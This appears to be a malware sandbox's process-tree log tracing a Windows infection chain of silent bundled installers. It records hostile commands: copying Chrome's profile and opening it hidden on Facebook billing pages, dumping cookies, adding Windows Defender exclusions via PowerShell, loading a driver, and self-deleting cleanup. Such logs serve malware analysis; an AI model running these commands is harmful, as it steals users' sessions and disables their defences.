C:\Users\Admin\AppData\Local\Temp\d0p3u3r3.bjh\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\d0p3u3r3.bjh\MultitimerFour.exe25⤵PID:4860
-
C:\Users\Admin\AppData\Local\Temp\7ZO0YGCPVD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\7ZO0YGCPVD\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10426⤵PID:4404
-
C:\Users\Admin\AppData\Local\Temp\7ZO0YGCPVD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\7ZO0YGCPVD\multitimer.exe" 1 3.1615014975.60432c3faf8a0 10427⤵PID:2736
-
C:\Users\Admin\AppData\Local\Temp\7ZO0YGCPVD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\7ZO0YGCPVD\multitimer.exe" 2 3.1615014975.60432c3faf8a028⤵PID:6660
-
C:\Users\Admin\AppData\Local\Temp\3js2eql0ded\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\3js2eql0ded\askinstall24.exe"29⤵PID:1368
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe30⤵PID:9040
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe31⤵
- Kills process with taskkill
PID:8224
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y30⤵PID:9036
-
-
-
C:\Users\Admin\AppData\Local\Temp\mbz2saqu1kj\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\mbz2saqu1kj\Setup3310.exe" /Verysilent /subid=57729⤵PID:5936
-
C:\Users\Admin\AppData\Local\Temp\is-0EOUC.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-0EOUC.tmp\Setup3310.tmp" /SL5="$3058E,802346,56832,C:\Users\Admin\AppData\Local\Temp\mbz2saqu1kj\Setup3310.exe" /Verysilent /subid=57730⤵PID:8424
-
C:\Users\Admin\AppData\Local\Temp\is-R6LDO.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-R6LDO.tmp\Setup.exe" /Verysilent31⤵PID:7700
-
C:\Users\Admin\AppData\Local\Temp\is-SKPGL.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SKPGL.tmp\Setup.tmp" /SL5="$707C8,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-R6LDO.tmp\Setup.exe" /Verysilent32⤵PID:8384
-
C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\ProPlugin.exe" /Verysilent33⤵PID:9892
-
C:\Users\Admin\AppData\Local\Temp\is-4J16H.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-4J16H.tmp\ProPlugin.tmp" /SL5="$4096E,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\ProPlugin.exe" /Verysilent34⤵PID:9352
-
C:\Users\Admin\AppData\Local\Temp\is-8GE7N.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-8GE7N.tmp\Setup.exe"35⤵PID:9572
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"36⤵PID:8936
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\PictureLAb.exe" /Verysilent33⤵PID:9360
-
C:\Users\Admin\AppData\Local\Temp\is-HV5L6.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-HV5L6.tmp\PictureLAb.tmp" /SL5="$5096E,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\PictureLAb.exe" /Verysilent34⤵PID:9156
-
C:\Users\Admin\AppData\Local\Temp\is-TRA8E.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-TRA8E.tmp\Setup.exe" /VERYSILENT35⤵PID:5220
-
C:\Users\Admin\AppData\Local\Temp\is-7FO3P.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-7FO3P.tmp\Setup.tmp" /SL5="$30A1A,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-TRA8E.tmp\Setup.exe" /VERYSILENT36⤵PID:4944
-
C:\Users\Admin\AppData\Local\Temp\is-BM2CV.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-BM2CV.tmp\kkkk.exe" /S /UID=lab21437⤵PID:10068
-
C:\Users\Admin\AppData\Local\Temp\7d-dcc34-0f9-1e9b0-2c0ccca486f68\Lihaecaepifae.exe"C:\Users\Admin\AppData\Local\Temp\7d-dcc34-0f9-1e9b0-2c0ccca486f68\Lihaecaepifae.exe"38⤵PID:10928
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3aarnulb.mk2\GcleanerWW.exe /mixone & exit39⤵PID:9376
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ghekwopl.njk\privacytools5.exe & exit39⤵PID:8868
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wkumpc2i.v2z\setup.exe /8-2222 & exit39⤵PID:10392
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\Delta.exe" /Verysilent33⤵PID:6092
-
C:\Users\Admin\AppData\Local\Temp\is-UCE2T.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-UCE2T.tmp\Delta.tmp" /SL5="$40990,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\Delta.exe" /Verysilent34⤵PID:8516
-
C:\Users\Admin\AppData\Local\Temp\is-0HMBO.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0HMBO.tmp\Setup.exe" /VERYSILENT35⤵PID:7976
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\zznote.exe" /Verysilent33⤵PID:10964
-
C:\Users\Admin\AppData\Local\Temp\is-3H8FU.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-3H8FU.tmp\zznote.tmp" /SL5="$20A98,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\zznote.exe" /Verysilent34⤵PID:10700
-
C:\Users\Admin\AppData\Local\Temp\is-QVG65.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-QVG65.tmp\jg4_4jaa.exe" /silent35⤵PID:11216
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vsejzqef1f0\s1zvnbrt1bm.exe"C:\Users\Admin\AppData\Local\Temp\vsejzqef1f0\s1zvnbrt1bm.exe" /ustwo INSTALL29⤵PID:6924
-
-
C:\Users\Admin\AppData\Local\Temp\hyfqtbi4hzd\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\hyfqtbi4hzd\chashepro3.exe" /VERYSILENT29⤵PID:6492
-
-
C:\Users\Admin\AppData\Local\Temp\ucuejts2jj5\safebits.exe"C:\Users\Admin\AppData\Local\Temp\ucuejts2jj5\safebits.exe" /S /pubid=1 /subid=45129⤵PID:5372
-
-
C:\Users\Admin\AppData\Local\Temp\4iycbpjfi2b\vict.exe"C:\Users\Admin\AppData\Local\Temp\4iycbpjfi2b\vict.exe" /VERYSILENT /id=53529⤵PID:8304
-
C:\Users\Admin\AppData\Local\Temp\is-6V3UG.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-6V3UG.tmp\vict.tmp" /SL5="$1088A,870426,780800,C:\Users\Admin\AppData\Local\Temp\4iycbpjfi2b\vict.exe" /VERYSILENT /id=53530⤵PID:8692
-
C:\Users\Admin\AppData\Local\Temp\is-0ENP0.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-0ENP0.tmp\wimapi.exe" 53531⤵PID:420
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sljxztw5eem\app.exe"C:\Users\Admin\AppData\Local\Temp\sljxztw5eem\app.exe" /8-2329⤵PID:8560
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Muddy-Fire"30⤵PID:9020
-
-
C:\Program Files (x86)\Muddy-Fire\7za.exe"C:\Program Files (x86)\Muddy-Fire\7za.exe" e -p154.61.71.51 winamp-plugins.7z30⤵PID:9332
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Muddy-Fire\app.exe" -map "C:\Program Files (x86)\Muddy-Fire\WinmonProcessMonitor.sys""30⤵PID:10448
-
C:\Program Files (x86)\Muddy-Fire\app.exe"C:\Program Files (x86)\Muddy-Fire\app.exe" -map "C:\Program Files (x86)\Muddy-Fire\WinmonProcessMonitor.sys"31⤵PID:11052
-
-
-
C:\Program Files (x86)\Muddy-Fire\7za.exe"C:\Program Files (x86)\Muddy-Fire\7za.exe" e -p154.61.71.51 winamp.7z30⤵PID:11020
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\Delta.exe" /Verysilent18⤵PID:6336
-
C:\Users\Admin\AppData\Local\Temp\is-ET942.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-ET942.tmp\Delta.tmp" /SL5="$206AE,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\Delta.exe" /Verysilent19⤵PID:1192
-
C:\Users\Admin\AppData\Local\Temp\is-L0NTV.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-L0NTV.tmp\Setup.exe" /VERYSILENT20⤵PID:7496
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-L0NTV.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit21⤵PID:4580
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f22⤵
- Kills process with taskkill
PID:400
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\zznote.exe" /Verysilent18⤵PID:6724
-
C:\Users\Admin\AppData\Local\Temp\is-G09E2.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-G09E2.tmp\zznote.tmp" /SL5="$306AE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\zznote.exe" /Verysilent19⤵PID:5260
-
C:\Users\Admin\AppData\Local\Temp\is-JRON6.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-JRON6.tmp\jg4_4jaa.exe" /silent20⤵PID:656
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\hjjgaa.exe" /Verysilent18⤵PID:5124
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt19⤵PID:6600
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt19⤵PID:7156
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bihlrbu3fjj\coatkfuxtvi.exe"C:\Users\Admin\AppData\Local\Temp\bihlrbu3fjj\coatkfuxtvi.exe" /ustwo INSTALL14⤵PID:7236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 65615⤵
- Program crash
PID:1848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 67215⤵
- Program crash
PID:6608
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 69615⤵
- Program crash
PID:5232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 81215⤵
- Program crash
PID:5944
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 90815⤵
- Program crash
PID:4008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 94415⤵
- Program crash
PID:3160
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 110015⤵
- Program crash
PID:6148
-
-
-
C:\Users\Admin\AppData\Local\Temp\qacx1gs4fgo\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\qacx1gs4fgo\askinstall24.exe"14⤵PID:5500
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe15⤵PID:6708
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe16⤵
- Kills process with taskkill
PID:7000
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y15⤵PID:4716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/15⤵PID:8292
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7fff7d126e00,0x7fff7d126e10,0x7fff7d126e2016⤵PID:8972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2272 /prefetch:816⤵PID:8168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2712 /prefetch:116⤵PID:9276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2704 /prefetch:116⤵PID:9240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:116⤵PID:5168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:116⤵PID:9868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:116⤵PID:9668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:116⤵PID:9640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1720 /prefetch:816⤵PID:9916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1672 /prefetch:216⤵PID:9684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4812 /prefetch:816⤵PID:8684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:116⤵PID:9100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:116⤵PID:9316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5676 /prefetch:816⤵PID:10268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5348 /prefetch:816⤵PID:8920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5916 /prefetch:816⤵PID:8900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1396 /prefetch:116⤵PID:9824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:116⤵PID:9724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1756 /prefetch:116⤵PID:10940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5744 /prefetch:816⤵PID:7964
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nt5w2h5uri5\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\nt5w2h5uri5\chashepro3.exe" /VERYSILENT14⤵PID:5904
-
C:\Users\Admin\AppData\Local\Temp\is-HQKQC.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-HQKQC.tmp\chashepro3.tmp" /SL5="$501EE,2015144,58368,C:\Users\Admin\AppData\Local\Temp\nt5w2h5uri5\chashepro3.exe" /VERYSILENT15⤵PID:7908
-
-
-
C:\Users\Admin\AppData\Local\Temp\v3jq22dmihw\vpn.exe"C:\Users\Admin\AppData\Local\Temp\v3jq22dmihw\vpn.exe" /silent /subid=48214⤵PID:3612
-
C:\Users\Admin\AppData\Local\Temp\is-6OM0N.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-6OM0N.tmp\vpn.tmp" /SL5="$30512,15170975,270336,C:\Users\Admin\AppData\Local\Temp\v3jq22dmihw\vpn.exe" /silent /subid=48215⤵PID:3708
-
-
-
C:\Users\Admin\AppData\Local\Temp\qn1ucqtkcdx\vict.exe"C:\Users\Admin\AppData\Local\Temp\qn1ucqtkcdx\vict.exe" /VERYSILENT /id=53514⤵PID:4444
-
C:\Users\Admin\AppData\Local\Temp\is-PG78Q.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-PG78Q.tmp\vict.tmp" /SL5="$50492,870426,780800,C:\Users\Admin\AppData\Local\Temp\qn1ucqtkcdx\vict.exe" /VERYSILENT /id=53515⤵PID:2400
-
C:\Users\Admin\AppData\Local\Temp\is-HDCH8.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-HDCH8.tmp\wimapi.exe" 53516⤵PID:3868
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\v3k2dwkfqpf\app.exe"C:\Users\Admin\AppData\Local\Temp\v3k2dwkfqpf\app.exe" /8-2314⤵PID:4840
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Misty-Darkness"15⤵PID:8096
-
-
C:\Program Files (x86)\Misty-Darkness\7za.exe"C:\Program Files (x86)\Misty-Darkness\7za.exe" e -p154.61.71.51 winamp-plugins.7z15⤵PID:5580
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Misty-Darkness\app.exe" -map "C:\Program Files (x86)\Misty-Darkness\WinmonProcessMonitor.sys""15⤵PID:5812
-
C:\Program Files (x86)\Misty-Darkness\app.exe"C:\Program Files (x86)\Misty-Darkness\app.exe" -map "C:\Program Files (x86)\Misty-Darkness\WinmonProcessMonitor.sys"16⤵PID:7132
-
-
-
C:\Program Files (x86)\Misty-Darkness\7za.exe"C:\Program Files (x86)\Misty-Darkness\7za.exe" e -p154.61.71.51 winamp.7z15⤵PID:812
-
-
C:\Program Files (x86)\Misty-Darkness\app.exe"C:\Program Files (x86)\Misty-Darkness\app.exe" /8-2315⤵PID:4860
-
-
-
C:\Users\Admin\AppData\Local\Temp\o2b5v1te02p\safebits.exe"C:\Users\Admin\AppData\Local\Temp\o2b5v1te02p\safebits.exe" /S /pubid=1 /subid=45114⤵PID:6320
-
-
C:\Users\Admin\AppData\Local\Temp\c5xx4sxjmrk\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\c5xx4sxjmrk\askinstall24.exe"14⤵PID:8820
-
-
C:\Users\Admin\AppData\Local\Temp\om2ckhzj15i\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\om2ckhzj15i\Setup3310.exe" /Verysilent /subid=57714⤵PID:10360
-
-
C:\Users\Admin\AppData\Local\Temp\zkdaarhbvsw\safebits.exe"C:\Users\Admin\AppData\Local\Temp\zkdaarhbvsw\safebits.exe" /S /pubid=1 /subid=45114⤵PID:9400
-
-
C:\Users\Admin\AppData\Local\Temp\wjcim4px1fs\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\wjcim4px1fs\chashepro3.exe" /VERYSILENT14⤵PID:10300
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s3z1yeks.t20\setup.exe /8-2222 & exit9⤵PID:6120
-
C:\Users\Admin\AppData\Local\Temp\s3z1yeks.t20\setup.exeC:\Users\Admin\AppData\Local\Temp\s3z1yeks.t20\setup.exe /8-222210⤵PID:7928
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Dry-Tree"11⤵PID:7164
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\Delta.exe" /Verysilent3⤵PID:6752
-
C:\Users\Admin\AppData\Local\Temp\is-88542.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-88542.tmp\Delta.tmp" /SL5="$404B2,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\Delta.exe" /Verysilent4⤵PID:4688
-
C:\Users\Admin\AppData\Local\Temp\is-6VR44.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-6VR44.tmp\Setup.exe" /VERYSILENT5⤵PID:7600
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-6VR44.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit6⤵PID:7472
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f7⤵
- Kills process with taskkill
PID:4976
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
